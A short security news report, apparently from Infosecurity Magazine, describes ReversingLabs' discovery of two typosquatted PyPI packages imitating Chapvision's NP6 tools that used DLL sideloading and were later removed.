Security researchers have identified a concerning uptick in malicious activities infiltrating open-source platforms and code repositories.
This trend encompasses a wide array of malicious activities, including hosting command-and-control infrastructure, storing stolen data and disseminating various forms of malware.
In a recent discovery, ReversingLabs reverse engineer Karlo Zanki uncovered two suspicious packages on the Python Package Index, named NP6HelperHttptest and NP6HelperHttper.
These packages were found to employ DLL sideloading, a technique malicious actors use to execute code discreetly and avoid detection by security monitoring tools.
Typosquatting and repojacking, also used in the deployment of these packages, are common tactics malicious actors employ to distribute look-alike packages, aiming to deceive developers into incorporating them into their applications.
The recent discovery of NP6HelperHttptest and NP6HelperHttper on PyPI exemplifies such tactics, exploiting similarities with legitimate NP6 packages - a marketing automation tool developed by Chapvision - to dupe unsuspecting users.
In this case, ReversingLabs discovered that the NP6 PyPI account wasn't officially associated with Chapvision; rather, it belonged to a Chapvision developer's personal account.
It remains uncertain whether the company was aware of the existence of the account, or of the NP6HelperHttp and NP6HelperConfig tools.
Upon notification of these packages by ReversingLabs, Chapvision confirmed that one of their employees had indeed published the helper tools.
Shortly thereafter, the packages were removed from PyPI. Further examination of the malicious packages revealed a sophisticated scheme involving executing malicious code hidden within setup.
These scripts facilitated the download and execution of both legitimate and malicious files, with the latter posing significant security risks.
ReversingLabs' research not only shed light on individual instances of malicious activity but also suggested a broader campaign involving multiple packages and sophisticated tactics, all relying on DLL sideloading.
This Cyber News was published on www.infosecurity-magazine.com. Publication date: Tue, 20 Feb 2024 17:45:27 +0000